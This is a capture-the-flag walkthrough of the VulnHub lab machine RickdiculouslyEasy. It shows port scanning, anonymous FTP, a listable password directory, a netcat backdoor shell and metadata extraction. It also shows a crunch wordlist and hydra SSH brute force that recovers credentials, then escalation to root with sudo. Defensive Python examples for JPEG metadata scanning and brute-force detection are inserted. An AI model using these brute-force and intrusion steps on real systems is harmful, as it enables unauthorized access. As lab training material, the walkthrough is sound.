Fourth Boot2Root RickdiculouslyEasy: 1
Hello Folks!
Link to the box :- https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
Rating :- Intermediate
Time :- 3 Hours
Welcome to the fourth Boot2Root. As always we start with arp-scan -l, which found the box at 192.168.43.27,
and then nmap the box. This time I had to do a full -p- scan, because SSH wasn't working on port 22 (it kept giving "connection refused"), so I ran nmap -p- 192.168.43.27.
The nmap scan returned this:
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
13337/tcp open unknown
22222/tcp open easyengine
60000/tcp open unknown
After this I decided to visit the FTP.
Anonymous login worked with a blank password and we got the first flag, pretty easy so far, so that's 10/130 of the total points.
root@localhost:~# ftp 192.168.43.27
Connected to 192.168.43.27.
220 (vsFTPd 3.0.3)
Name (192.168.43.27:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.03 secs (1.6210 kB/s)
ftp> bye
221 Goodbye.
root@localhost:~# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
Moving on to port 80, I found this:
Nothing hiding in the source code, plain and simple HTTP, so as always I planned to visit /robots.txt and see if it exists. Once I opened /robots.txt:
That cgi-bin was really tempting me to try Shellshock without thinking too much, but I decided to visit all the links from the top down.
The first link was a troll, as expected; nobody gives out root shell info that easily xP
Time to check out the second link, maybe it'll be something we can use?
Well well, what do I know: I tried a simple command injection and it revealed a bunch of information, so now we know there are 3 users, "Morty/Summer/RickSanchez". Maybe we can use them to SSH?
Moving on, the last link was useless, so I planned to dirb for something useful.
root@localhost:~# dirb http://192.168.43.27
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 12 17:50:08 2017
URL_BASE: http://192.168.43.27/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.43.27/ ----
+ http://192.168.43.27/cgi-bin/ (CODE:403|SIZE:217)
+ http://192.168.43.27/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://192.168.43.27/passwords/
+ http://192.168.43.27/robots.txt (CODE:200|SIZE:126)
---- Entering directory: http://192.168.43.27/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Oct 12 17:50:09 2017
DOWNLOADED: 4612 - FOUND: 3
Time to visit the /passwords directory; it looks like something we can use with the set of usernames we have.
There we go, a password and a username: "Summer and winter" sounds like something we can use together?
So that's a total of 2 flags (20/130), getting there I guess. Next I planned to visit the zeus-admin page on port 9090 to see if I can find anything useful.
That adds up to (30/130), which is pretty cool. After this I started checking the remaining open ports from our nmap scan and found a few more flags.
After going through all the ports we learned that SSH is actually on 22222, and found two more flags, which totals up to (50/130).
root@localhost:~# nc -nv 192.168.43.27 13337
(UNKNOWN) [192.168.43.27] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
root@localhost:~# nc -nv 192.168.43.27 22222
(UNKNOWN) [192.168.43.27] 22222 (?) open
SSH-2.0-OpenSSH_7.5
^C
root@localhost:~# nc -nv 192.168.43.27 60000
(UNKNOWN) [192.168.43.27] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# less FLAG.txt
less FLAG.txt: command not found
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
#
Let's get to the SSH then.
root@localhost:~# ssh Summer@192.168.43.27 -p 22222
Summer@192.168.43.27's password:
Last login: Thu Oct 12 21:52:39 2017 from 192.168.43.71
[Summer@localhost ~]$ ls
FLAG.txt
[Summer@localhost ~]$ less FLAG.txt
[Summer@localhost ~]$ FLAG{Get off the high road Summer!} - 10 Points^C
[Summer@localhost ~]$
Once we were done with this flag, I planned to visit /home and found this:
[Summer@localhost ~]$ cd /home
[Summer@localhost home]$ ls
Morty RickSanchez Summer
[Summer@localhost home]$ cd Morty
[Summer@localhost Morty]$ ls
journal.txt.zip Safe_Password.jpg
[Summer@localhost Morty]$ exit
logout
Connection to 192.168.43.27 closed.
root@localhost:~#
Time to copy these files to the local host and enumerate them further for some more clues.
root@localhost:~# scp -P 22222 Summer@192.168.43.27:/home/Morty/Safe_Password.jpg /root/Desktop/VulnHub
Summer@192.168.43.27's password:
Safe_Password.jpg 100% 42KB 3.8MB/s 00:00
root@localhost:~# scp -P 22222 Summer@192.168.43.27:/home/Morty/journal.txt.zip /root/Desktop/VulnHub
Summer@192.168.43.27's password:
journal.txt.zip 100% 414 13.0KB/s 00:00
root@localhost:~# cd Desktop/VulnHub
root@localhost:~/Desktop/VulnHub# ls
journal.txt.zip Rickd Safe_Password.jpg
Once I had copied them over, I decided to run strings on the image and see if I could find anything in there.
root@localhost:~/Desktop/VulnHub/Rickd# strings Safe_Password.jpg
JFIF
Exif
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
8BIM
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
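The hint that strings pulled out lives in the image's metadata segments, not in its pixel data. As an added example (not from the original post), this Python scanner walks the JPEG marker segments and reports printable text found only in COM/APPn segments, the kind of check to run on images before they are shared; the JPEG it builds is a constructed sample, not the box's file.

```python
import struct

METADATA_MARKERS = {0xFE: "COM", **{0xE0 + i: f"APP{i}" for i in range(16)}}  # COM, APP0..APP15

def jpeg_segments(data: bytes):
    """Walk marker segments up to SOS/EOI; return [(marker, payload)]."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos, segs = 2, []
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS (entropy-coded image data follows)
            break
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # counts its own 2 bytes
        segs.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
    return segs

def printable_runs(blob: bytes, minlen: int = 8):
    """Like strings(1): printable ASCII runs of at least minlen bytes."""
    runs, cur = [], bytearray()
    for b in blob + b"\x00":  # trailing sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= minlen:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs

def find_embedded_text(data: bytes, minlen: int = 8):
    """Return [(segment name, text)] for text sitting in metadata segments only."""
    hits = []
    for marker, payload in jpeg_segments(data):
        name = METADATA_MARKERS.get(marker)
        if name:
            hits.extend((name, run) for run in printable_runs(payload, minlen))
    return hits

def build_sample_jpeg(comment: bytes) -> bytes:
    """Constructed sample: SOI, JFIF APP0, one COM segment, EOI (no image data)."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", len(jfif) + 2) + jfif
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"

SAMPLE = build_sample_jpeg(b"The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek")
```

Running find_embedded_text(SAMPLE) reports the COM segment's text and ignores the short "JFIF" run in APP0; on a real file, Exif (APP1) and Photoshop "8BIM" (APP13) blocks are scanned the same way.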
With the password "Meeseek" I was able to open the zip file and found this:
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
So we found the next flag, which makes the total (80/130). After reading the hint about the safe I came up with the idea to visit the SSH again and see if we can find something inside the RickSanchez directory.
root@localhost:~# ssh Summer@192.168.43.27 -p 22222
Summer@192.168.43.27's password:
Last login: Thu Oct 12 23:35:03 2017 from 192.168.43.71
[Summer@localhost ~]$ ls
FLAG.txt
[Summer@localhost ~]$ cd /home
[Summer@localhost home]$ ls
Morty RickSanchez Summer
[Summer@localhost home]$ cd RickSanchez
[Summer@localhost RickSanchez]$ ls
RICKS_SAFE ThisDoesntContainAnyFlags
[Summer@localhost RickSanchez]$ cd RICKS_SAFE
[Summer@localhost RICKS_SAFE]$ ls
safe
[Summer@localhost RICKS_SAFE]$
Back out of SSH, time to copy that file over and see if we can use 131333 as the password to open this safe file.
root@localhost:~/Desktop/VulnHub# ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
root@localhost:~/Desktop/VulnHub# ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.
That makes the total (100/130). After a little bit of Googling I learned that Sanchez's band was "The Flesh Curtains",
so I decided to build a password list with crunch (in its -t pattern, `,` stands for an uppercase letter and `%` for a digit, matching the hint) and bruteforce the SSH login for Sanchez.
root@localhost:~/del# crunch 10 10 -t ,%Curtains -o ./worlist.curtains
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
root@localhost:~/del# crunch 7 7 -t ,%Flesh -o ./worlist.flesh
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
root@localhost:~# cat worlist.curtains >WL
root@localhost:~# cat worlist.flesh >> WL
root@localhost:~/del# cat WL| wc -l
520
So with everything ready, let's bruteforce the SSH login with hydra.
root@localhost:~# hydra -l RickSanchez -P WL ssh://192.168.56.102 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.56.102:22222/
[22222][ssh] host: 192.168.56.102 login: RickSanchez password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39
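The hydra run above throws 16 parallel tasks and 520 password attempts at sshd in about 30 seconds, which is very loud on the server side. As an added example that is not from the original post, this Python detector parses sshd auth-log lines (the sample lines are constructed, not real logs from the box) and flags a source that racks up a threshold of failed logins for one account inside a short window, noting whether a successful login followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)

def parse(line: str, year: int = 2017):
    """Parse a syslog-style sshd password line; return (ts, result, user, src) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map (src, user) -> alert for sources with >= threshold failures inside window."""
    recent = defaultdict(list)  # (src, user) -> failure timestamps still inside window
    alerts = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        if result == "Failed":
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:  # slide the window forward
                q.pop(0)
            if len(q) >= threshold:
                alerts[key] = {"failures": len(q), "success_after": False}
        elif key in alerts:  # success right after a burst: treat as likely compromise
            alerts[key]["success_after"] = True
    return alerts

def sample_log():
    """Constructed sample: 16 failures in ~2 s against one account, then a success."""
    burst = [
        f"Oct 12 22:17:{i // 8:02d} localhost sshd[{2300 + i}]: Failed password "
        f"for RickSanchez from 192.168.43.71 port {50100 + i} ssh2"
        for i in range(16)
    ]
    burst.append("Oct 12 22:17:03 localhost sshd[2317]: Accepted password for RickSanchez from 192.168.43.71 port 50126 ssh2")
    burst.append("Oct 12 22:30:00 localhost sshd[2400]: Failed password for Summer from 192.168.43.50 port 40001 ssh2")
    return burst
```

detect_bruteforce(sample_log()) returns one alert for (192.168.43.71, RickSanchez) with 16 failures and success_after set, while Summer's lone failure stays below the threshold.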
We found the credentials (RickSanchez:P7Curtains). Let's SSH in with them and see if we can get the final flag. We also saw in the safe file's hint that "sudo is wheely good", so I ran sudo -i, entered the password, and found this:
root@localhost:~# ssh RickSanchez@192.168.43.27 -p 22222
RickSanchez@192.168.43.27's password:
Last login: Thu Oct 12 22:17:45 2017 from 192.168.43.71
[RickSanchez@localhost ~]$ ls
RICKS_SAFE ThisDoesntContainAnyFlags
[RickSanchez@localhost ~]$ sudo -i
[sudo] password for RickSanchez:
[root@localhost ~]# ls
anaconda-ks.cfg FLAG.txt
[root@localhost ~]# less FLAG.txt
[root@localhost ~]# FLAG: {Ionic Defibrillator} - 30 points
And it's a wrap: 130/130. Simply amazing box, not really "easy".
Thank you!!